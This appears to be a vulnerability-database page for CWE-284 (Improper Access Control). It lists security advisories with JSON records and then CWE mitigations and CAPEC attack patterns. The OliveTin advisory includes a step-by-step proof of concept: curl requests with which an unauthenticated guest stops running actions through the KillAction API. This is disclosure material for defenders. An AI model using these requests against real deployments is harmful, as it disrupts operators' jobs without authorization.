Common Weakness Enumeration

CWE-284

Discouraged

Improper Access Control

Abstraction: Pillar · Status: Incomplete

The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.

7803 vulnerabilities reference this CWE, most recent first.

GHSA-4F7J-PX6V-M38X

Vulnerability from github – Published: 2025-02-14 00:30 – Updated: 2025-03-17 21:30
VLAI
Details

Wazuh SIEM version 4.8.2 is affected by a broken access control vulnerability. This issue allows the unauthorized creation of internal users without assigning any existing user role, potentially leading to privilege escalation or unauthorized access to sensitive resources.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-57378"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-13T22:15:11Z",
    "severity": "HIGH"
  },
  "details": "Wazuh SIEM version 4.8.2 is affected by a broken access control vulnerability. This issue allows the unauthorized creation of internal users without assigning any existing user role, potentially leading to privilege escalation or unauthorized access to sensitive resources.",
  "id": "GHSA-4f7j-px6v-m38x",
  "modified": "2025-03-17T21:30:30Z",
  "published": "2025-02-14T00:30:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-57378"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bappe-sarker/Vulnerability-Research/tree/main/CVE-2024-57378"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4F7P-MHH6-P6R7

Vulnerability from github – Published: 2022-05-17 03:38 – Updated: 2022-05-17 03:38
VLAI
Details

The XML parser in Lifecycle Query Engine (LQE) in IBM Jazz Reporting Service 6.0 and 6.0.1 before 6.0.1 iFix006 allows remote authenticated administrators to read arbitrary files or cause a denial of service via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2016-0319"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2016-11-25T20:59:00Z",
    "severity": "HIGH"
  },
  "details": "The XML parser in Lifecycle Query Engine (LQE) in IBM Jazz Reporting Service 6.0 and 6.0.1 before 6.0.1 iFix006 allows remote authenticated administrators to read arbitrary files or cause a denial of service via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.",
  "id": "GHSA-4f7p-mhh6-p6r7",
  "modified": "2022-05-17T03:38:37Z",
  "published": "2022-05-17T03:38:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0319"
    },
    {
      "type": "WEB",
      "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983137"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/92475"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4FG5-759R-24X3

Vulnerability from github – Published: 2025-02-20 18:31 – Updated: 2025-02-20 21:30
VLAI
Details

DDSN Interactive cm3 Acora CMS version 10.1.1 contains an improper access control vulnerability. An editor-privileged user can access sensitive information, such as system administrator credentials, by force browsing the endpoint and exploiting the 'file' parameter. By referencing specific files (e.g., cm3.xml), attackers can bypass access controls, leading to account takeover and potential privilege escalation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-25968"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-20T18:15:26Z",
    "severity": "MODERATE"
  },
  "details": "DDSN Interactive cm3 Acora CMS version 10.1.1 contains an improper access control vulnerability. An editor-privileged user can access sensitive information, such as system administrator credentials, by force browsing the endpoint and exploiting the \u0027file\u0027 parameter. By referencing specific files (e.g., cm3.xml), attackers can bypass access controls, leading to account takeover and potential privilege escalation.",
  "id": "GHSA-4fg5-759r-24x3",
  "modified": "2025-02-20T21:30:52Z",
  "published": "2025-02-20T18:31:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25968"
    },
    {
      "type": "WEB",
      "url": "https://github.com/padayali-JD/CVE-2025-25968"
    },
    {
      "type": "WEB",
      "url": "http://ddsn.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4FH5-7H44-VX78

Vulnerability from github – Published: 2022-05-17 03:52 – Updated: 2022-05-17 03:52
VLAI
Details

The IBM Watson Developer Cloud services on Bluemix platforms do not properly generate random numbers for service-instance credentials, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via a brute-force attack.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2016-0391"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2016-07-02T14:59:00Z",
    "severity": "CRITICAL"
  },
  "details": "The IBM Watson Developer Cloud services on Bluemix platforms do not properly generate random numbers for service-instance credentials, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via a brute-force attack.",
  "id": "GHSA-4fh5-7h44-vx78",
  "modified": "2022-05-17T03:52:03Z",
  "published": "2022-05-17T03:52:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0391"
    },
    {
      "type": "WEB",
      "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982615"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4FJ3-HVJ6-PJ6H

Vulnerability from github – Published: 2025-08-09 21:30 – Updated: 2025-08-09 21:30
VLAI
Details

A vulnerability classified as critical has been found in linlinjava litemall up to 1.8.0. Affected is the function Upload of the file /wx/storage/upload. The manipulation of the argument File leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-8764"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-09T19:15:32Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability classified as critical has been found in linlinjava litemall up to 1.8.0. Affected is the function Upload of the file /wx/storage/upload. The manipulation of the argument File leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.",
  "id": "GHSA-4fj3-hvj6-pj6h",
  "modified": "2025-08-09T21:30:22Z",
  "published": "2025-08-09T21:30:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8764"
    },
    {
      "type": "WEB",
      "url": "https://github.com/linlinjava/litemall/issues/567"
    },
    {
      "type": "WEB",
      "url": "https://github.com/linlinjava/litemall/issues/567#issue-3268166914"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.319266"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.319266"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.623957"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-4FM5-C8MR-GHGF

Vulnerability from github – Published: 2024-08-14 15:31 – Updated: 2024-08-14 15:31
VLAI
Details

improper access control in firmware for some Intel(R) FPGA products before version 24.1 may allow a privileged user to enable escalation of privilege via local access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-25576"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-14T14:15:23Z",
    "severity": "HIGH"
  },
  "details": "improper access control in firmware for some Intel(R) FPGA products before version 24.1 may allow a privileged user to enable escalation of privilege via local access.",
  "id": "GHSA-4fm5-c8mr-ghgf",
  "modified": "2024-08-14T15:31:15Z",
  "published": "2024-08-14T15:31:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25576"
    },
    {
      "type": "WEB",
      "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01087.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-4FP9-VJR2-55J3

Vulnerability from github – Published: 2026-03-25 03:31 – Updated: 2026-03-25 15:31
VLAI
Details

A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 26.4 and iPadOS 26.4, macOS Tahoe 26.4, visionOS 26.4. An app may be able to enumerate a user's installed apps.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-28833"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-25T01:17:08Z",
    "severity": "MODERATE"
  },
  "details": "A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 26.4 and iPadOS 26.4, macOS Tahoe 26.4, visionOS 26.4. An app may be able to enumerate a user\u0027s installed apps.",
  "id": "GHSA-4fp9-vjr2-55j3",
  "modified": "2026-03-25T15:31:28Z",
  "published": "2026-03-25T03:31:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28833"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/126792"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/126794"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/126799"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4FQM-6FMH-82MQ

Vulnerability from github – Published: 2026-03-02 21:42 – Updated: 2026-03-05 22:49
VLAI
Summary
OliveTin has Unauthenticated Action Termination via KillAction When Guests Must Login
Details

Summary

OliveTin allows an unauthenticated guest to terminate running actions through KillAction even when authRequireGuestsToLogin: true is enabled. In the tested release (3000.10.2), guests are correctly blocked from dashboard access, but an still call the KillAction RPC directly and successfully stop a running action. This is a broken access control issue that causes unauthorized denial of service against legitimate action executions.

Details

The issue is caused by inconsistent authorization enforcement between dashboard access and action-control RPCs.

KillAction() authenticates the caller and applies only the per-action kill ACL check:

  • service/internal/api/api.go:62

However, it does not enforce the guest login requirement. The guest/login gate exists separately in:

  • service/internal/api/api.go:474

That gate is used by dashboard-style methods, but not by KillAction.

In addition, when authRequireGuestsToLogin is enabled, config sanitization disables guest view, exec, and logs permissions, but leaves kill unchanged:

  • service/internal/config/sanitize.go:160

Specifically:

  • DefaultPermissions.View = false
  • DefaultPermissions.Exec = false
  • DefaultPermissions.Logs = false
  • DefaultPermissions.Kill remains unchanged

As a result, in the default configuration path where Kill remains allowed, an unauthenticated guest user can still satisfy IsAllowedKill():

  • service/internal/acl/acl.go:133

I validated this behavior on a clean 3000.10.2 setup:

  • guests were denied access to GetDashboard
  • an authenticated admin user started a long-running action
  • an unauthenticated guest successfully called KillAction
  • the action was terminated

This confirms a real authorization bypass affecting action termination.

PoC

Tested version:

  3000.10.2
  1. Create a minimal config:
  mkdir -p /tmp/olivetin-kill-bypass
  cat > /tmp/olivetin-kill-bypass/config.yaml <<'YAML'
  listenAddressSingleHTTPFrontend: 0.0.0.0:1337
  logLevel: "DEBUG"
  checkForUpdates: false

  authRequireGuestsToLogin: true
  authLocalUsers:
    enabled: true
    users:
      - username: "admin"
        usergroup: "admin"
        password: "$argon2id$v=19$m=65536,t=4,p=2$JLk85PhCL7RPboAlsYO4Lw$bQj6uhKnBpisbGRhe271cEt59S9EqYrHKeCfykypbZ4"

  accessControlLists:
    - name: adminall
      addToEveryAction: true
      matchUsernames: ["admin"]
      permissions:
        view: true
        exec: true
        logs: true
        kill: true

  actions:
    - title: long-running
      id: long-running
      shell: sleep 20
      timeout: 30
  YAML
  1. Start OliveTin 3000.10.2:
  docker rm -f olivetin-kill-bypass 2>/dev/null || true
  docker run -d --name olivetin-kill-bypass \
    -p 1347:1337 \
    -v /tmp/olivetin-kill-bypass:/config:ro \
    ghcr.io/olivetin/olivetin:3000.10.2
  1. Confirm the server is ready:
  curl -i http://127.0.0.1:1347/readyz
  1. Prove guests are blocked from dashboard access:
  curl -i -X POST http://127.0.0.1:1347/api/GetDashboard \
    -H 'Content-Type: application/json' \
    --data '{"title":"default"}'

  Observed response:

  HTTP/1.1 403 Forbidden
  {"code":"permission_denied","message":"guests are not allowed to access the dashboard"}
  1. Log in as admin:
  curl -c /tmp/ot_admin_cookie.txt -i -X POST http://127.0.0.1:1347/api/LocalUserLogin \
    -H 'Content-Type: application/json' \
    --data '{"username":"admin","password":"SecretPass123!"}'
  1. Start a long-running action as admin:
  curl -i -b /tmp/ot_admin_cookie.txt -X POST http://127.0.0.1:1347/api/StartAction \
    -H 'Content-Type: application/json' \
    --data '{"bindingId":"long-running","arguments":[],"uniqueTrackingId":"kill-hunt-1"}'

  Observed response:

  HTTP/1.1 200 OK
  {"executionTrackingId":"kill-hunt-1"}
  1. Kill it as an unauthenticated guest:
  curl -i -X POST http://127.0.0.1:1347/api/KillAction \
    -H 'Content-Type: application/json' \
    --data '{"executionTrackingId":"kill-hunt-1"}'

Observed response:

  HTTP/1.1 200 OK
  {"executionTrackingId":"kill-hunt-1","killed":true,"alreadyCompleted":false,"found":true}
  1. Confirm in container logs:
  docker logs olivetin-kill-bypass 2>&1 | tail -n 120

Observed relevant lines:

  Authenticated API request ... path="/olivetin.api.v1.OliveTinApiService/GetDashboard" ... username="guest"
  Authenticated API request ... path="/olivetin.api.v1.OliveTinApiService/StartAction" ... username="admin"
  Action started actionTitle="long-running"
  Authenticated API request ... path="/olivetin.api.v1.OliveTinApiService/KillAction" ... username="guest"
  Killing execution request by tracking ID: kill-hunt-1
  Action finished actionTitle="long-running" exit="-1"

This proves:

  • guests are denied dashboard access
  • guests can still invoke KillAction
  • the running action is successfully terminated by an unauthenticated user

Impact

This is an unauthenticated broken access control vulnerability resulting in denial of service.

An unauthenticated guest can:

  • terminate active jobs started by legitimate users
  • disrupt long-running administrative or operational workflows
  • interfere with privileged actions without being allowed to log in

Who is impacted:

  • OliveTin deployments with authRequireGuestsToLogin: true
  • multi-user environments where actions may run for meaningful durations
  • operational environments where stopping a running action can interrupt maintenance, deployment, backup, or service-control tasks

This issue does not require valid credentials, only knowledge of a live executionTrackingId. That still makes it a real and exploitable availability issue in environments where execution identifiers can be observed or predicted through adjacent leaks or shared operator knowledge.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/OliveTin/OliveTin"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260302002902-d9804182eae4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28790"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-862",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-02T21:42:12Z",
    "nvd_published_at": "2026-03-05T20:16:16Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nOliveTin allows an unauthenticated guest to terminate running actions through KillAction even when authRequireGuestsToLogin: true is enabled. In the tested release (3000.10.2), guests are correctly blocked from dashboard access, but an still call the KillAction RPC directly and successfully stop a running action. This is a broken access control issue that causes unauthorized denial of service against legitimate action executions.\n\n\n\n\n### Details\nThe issue is caused by inconsistent authorization enforcement between dashboard access and action-control RPCs.\n\n  KillAction() authenticates the caller and applies only the per-action kill ACL check:\n\n  - service/internal/api/api.go:62\n\n  However, it does not enforce the guest login requirement. The guest/login gate exists separately in:\n\n  - service/internal/api/api.go:474\n\n  That gate is used by dashboard-style methods, but not by KillAction.\n\n  In addition, when authRequireGuestsToLogin is enabled, config sanitization disables guest view, exec, and logs permissions, but leaves kill unchanged:\n\n  - service/internal/config/sanitize.go:160\n\n  Specifically:\n\n  - DefaultPermissions.View = false\n  - DefaultPermissions.Exec = false\n  - DefaultPermissions.Logs = false\n  - DefaultPermissions.Kill remains unchanged\n\n  As a result, in the default configuration path where Kill remains allowed, an unauthenticated guest user can still satisfy IsAllowedKill():\n\n  - service/internal/acl/acl.go:133\n\n  I validated this behavior on a clean 3000.10.2 setup:\n\n  - guests were denied access to GetDashboard\n  - an authenticated admin user started a long-running action\n  - an unauthenticated guest successfully called KillAction\n  - the action was terminated\n\n  This confirms a real authorization bypass affecting action termination.\n\n\n### PoC\n Tested version:\n```\n  3000.10.2\n```\n  1. Create a minimal config:\n```bash\n  mkdir -p /tmp/olivetin-kill-bypass\n  cat \u003e /tmp/olivetin-kill-bypass/config.yaml \u003c\u003c\u0027YAML\u0027\n  listenAddressSingleHTTPFrontend: 0.0.0.0:1337\n  logLevel: \"DEBUG\"\n  checkForUpdates: false\n\n  authRequireGuestsToLogin: true\n  authLocalUsers:\n    enabled: true\n    users:\n      - username: \"admin\"\n        usergroup: \"admin\"\n        password: \"$argon2id$v=19$m=65536,t=4,p=2$JLk85PhCL7RPboAlsYO4Lw$bQj6uhKnBpisbGRhe271cEt59S9EqYrHKeCfykypbZ4\"\n\n  accessControlLists:\n    - name: adminall\n      addToEveryAction: true\n      matchUsernames: [\"admin\"]\n      permissions:\n        view: true\n        exec: true\n        logs: true\n        kill: true\n\n  actions:\n    - title: long-running\n      id: long-running\n      shell: sleep 20\n      timeout: 30\n  YAML\n```\n  2. Start OliveTin 3000.10.2:\n```bash\n  docker rm -f olivetin-kill-bypass 2\u003e/dev/null || true\n  docker run -d --name olivetin-kill-bypass \\\n    -p 1347:1337 \\\n    -v /tmp/olivetin-kill-bypass:/config:ro \\\n    ghcr.io/olivetin/olivetin:3000.10.2\n```\n  3. Confirm the server is ready:\n```bash\n  curl -i http://127.0.0.1:1347/readyz\n```\n  4. Prove guests are blocked from dashboard access:\n```bash\n  curl -i -X POST http://127.0.0.1:1347/api/GetDashboard \\\n    -H \u0027Content-Type: application/json\u0027 \\\n    --data \u0027{\"title\":\"default\"}\u0027\n\n  Observed response:\n\n  HTTP/1.1 403 Forbidden\n  {\"code\":\"permission_denied\",\"message\":\"guests are not allowed to access the dashboard\"}\n```\n  5. Log in as admin:\n```bash\n  curl -c /tmp/ot_admin_cookie.txt -i -X POST http://127.0.0.1:1347/api/LocalUserLogin \\\n    -H \u0027Content-Type: application/json\u0027 \\\n    --data \u0027{\"username\":\"admin\",\"password\":\"SecretPass123!\"}\u0027\n```\n  6. Start a long-running action as admin:\n```bash\n  curl -i -b /tmp/ot_admin_cookie.txt -X POST http://127.0.0.1:1347/api/StartAction \\\n    -H \u0027Content-Type: application/json\u0027 \\\n    --data \u0027{\"bindingId\":\"long-running\",\"arguments\":[],\"uniqueTrackingId\":\"kill-hunt-1\"}\u0027\n\n  Observed response:\n\n  HTTP/1.1 200 OK\n  {\"executionTrackingId\":\"kill-hunt-1\"}\n```\n  7. Kill it as an unauthenticated guest:\n```bash\n  curl -i -X POST http://127.0.0.1:1347/api/KillAction \\\n    -H \u0027Content-Type: application/json\u0027 \\\n    --data \u0027{\"executionTrackingId\":\"kill-hunt-1\"}\u0027\n```\n  Observed response:\n```bash\n  HTTP/1.1 200 OK\n  {\"executionTrackingId\":\"kill-hunt-1\",\"killed\":true,\"alreadyCompleted\":false,\"found\":true}\n```\n  8. Confirm in container logs:\n```bash\n  docker logs olivetin-kill-bypass 2\u003e\u00261 | tail -n 120\n```\n  Observed relevant lines:\n```bash\n  Authenticated API request ... path=\"/olivetin.api.v1.OliveTinApiService/GetDashboard\" ... username=\"guest\"\n  Authenticated API request ... path=\"/olivetin.api.v1.OliveTinApiService/StartAction\" ... username=\"admin\"\n  Action started actionTitle=\"long-running\"\n  Authenticated API request ... path=\"/olivetin.api.v1.OliveTinApiService/KillAction\" ... username=\"guest\"\n  Killing execution request by tracking ID: kill-hunt-1\n  Action finished actionTitle=\"long-running\" exit=\"-1\"\n```\n  This proves:\n\n  - guests are denied dashboard access\n  - guests can still invoke KillAction\n  - the running action is successfully terminated by an unauthenticated user\n\n\n### Impact\nThis is an unauthenticated broken access control vulnerability resulting in denial of service.\n\n  An unauthenticated guest can:\n\n  - terminate active jobs started by legitimate users\n  - disrupt long-running administrative or operational workflows\n  - interfere with privileged actions without being allowed to log in\n\n  Who is impacted:\n\n  - OliveTin deployments with authRequireGuestsToLogin: true\n  - multi-user environments where actions may run for meaningful durations\n  - operational environments where stopping a running action can interrupt maintenance, deployment, backup, or service-control tasks\n\n  This issue does not require valid credentials, only knowledge of a live executionTrackingId. That still makes it a real and exploitable availability issue in environments where execution identifiers can be observed or predicted\n  through adjacent leaks or shared operator knowledge.",
  "id": "GHSA-4fqm-6fmh-82mq",
  "modified": "2026-03-05T22:49:37Z",
  "published": "2026-03-02T21:42:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-4fqm-6fmh-82mq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28790"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OliveTin/OliveTin/commit/d9804182eae43cf49f735e6533ddbe1541c2b9a9"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OliveTin/OliveTin"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OliveTin/OliveTin/releases/tag/3000.11.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OliveTin has Unauthenticated Action Termination via KillAction When Guests Must Login"
}

GHSA-4FR9-73W7-J6W3

Vulnerability from github – Published: 2022-05-17 00:29 – Updated: 2022-05-17 00:29
VLAI
Details

MediaWiki before 1.18.5, and 1.19.x before 1.19.2 allows remote attackers to bypass GlobalBlocking extension IP address blocking and create an account via unspecified vectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2012-4380"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-10-19T21:29:00Z",
    "severity": "HIGH"
  },
  "details": "MediaWiki before 1.18.5, and 1.19.x before 1.19.2 allows remote attackers to bypass GlobalBlocking extension IP address blocking and create an account via unspecified vectors.",
  "id": "GHSA-4fr9-73w7-j6w3",
  "modified": "2022-05-17T00:29:22Z",
  "published": "2022-05-17T00:29:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-4380"
    },
    {
      "type": "WEB",
      "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=686330"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=853440"
    },
    {
      "type": "WEB",
      "url": "https://lists.wikimedia.org/pipermail/mediawiki-announce/2012-August/000119.html"
    },
    {
      "type": "WEB",
      "url": "https://phabricator.wikimedia.org/T41824"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2012/08/31/10"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2012/08/31/6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4G62-MFWX-4Q48

Vulnerability from github – Published: 2022-05-13 01:21 – Updated: 2024-10-22 17:25
VLAI
Summary
slixmpp Incorrect Access Control
Details

slixmpp version before commit 7cd73b594e8122dddf847953fcfc85ab4d316416 contains an incorrect Access Control vulnerability in XEP-0223 plugin (Persistent Storage of Private Data via PubSub) options profile, used for the configuration of default access model that can result in all of the contacts of the victim can see private data having been published to a PEP node. This attack appears to be exploitable if the user of this library publishes any private data on PEP, the node isn't configured to be private. This vulnerability appears to have been fixed in commit 7cd73b594e8122dddf847953fcfc85ab4d316416 which is included in slixmpp 1.4.2.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "slixmpp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2019-1000021"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-07-19T18:13:30Z",
    "nvd_published_at": "2019-02-04T21:29:00Z",
    "severity": "HIGH"
  },
  "details": "slixmpp version before commit 7cd73b594e8122dddf847953fcfc85ab4d316416 contains an incorrect Access Control vulnerability in XEP-0223 plugin (Persistent Storage of Private Data via PubSub) options profile, used for the configuration of default access model that can result in all of the contacts of the victim can see private data having been published to a PEP node. This attack appears to be exploitable if the user of this library publishes any private data on PEP, the node isn\u0027t configured to be private. This vulnerability appears to have been fixed in commit 7cd73b594e8122dddf847953fcfc85ab4d316416 which is included in slixmpp 1.4.2.",
  "id": "GHSA-4g62-mfwx-4q48",
  "modified": "2024-10-22T17:25:28Z",
  "published": "2022-05-13T01:21:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1000021"
    },
    {
      "type": "WEB",
      "url": "https://github.com/poezio/slixmpp/commit/7cd73b594e8122dddf847953fcfc85ab4d316416"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/poezio/slixmpp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/slixmpp/PYSEC-2019-121.yaml"
    },
    {
      "type": "WEB",
      "url": "https://lab.louiz.org/poezio/slixmpp/commit/7cd73b594e8122dddf847953fcfc85ab4d316416"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GKBXN7EAAR7ENEZUBKV6C6MP6QBXYTWT"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WIBP4LD2V4TBJSLZXDUAGQMD6CUI2TZR"
    },
    {
      "type": "WEB",
      "url": "https://xmpp.org/extensions/xep-0223.html#howitworks"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "slixmpp Incorrect Access Control"
}

Mitigation MIT-1
Architecture and Design Operation

Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.

Mitigation MIT-46
Architecture and Design

Strategy: Separation of Privilege

  • Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.
  • Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
CAPEC-19: Embedding Scripts within Scripts

An adversary leverages the capability to execute their own script by embedding it within other scripts that the target software is likely to execute due to programs' vulnerabilities that are brought on by allowing remote hosts to execute scripts.

CAPEC-441: Malicious Logic Insertion

An adversary installs or adds malicious logic (also known as malware) into a seemingly benign component of a fielded system. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems and their components that are still under development and part of the supply chain.

CAPEC-478: Modification of Windows Service Configuration

An adversary exploits a weakness in access control to modify the execution parameters of a Windows service. The goal of this attack is to execute a malicious binary in place of an existing service.

CAPEC-479: Malicious Root Certificate

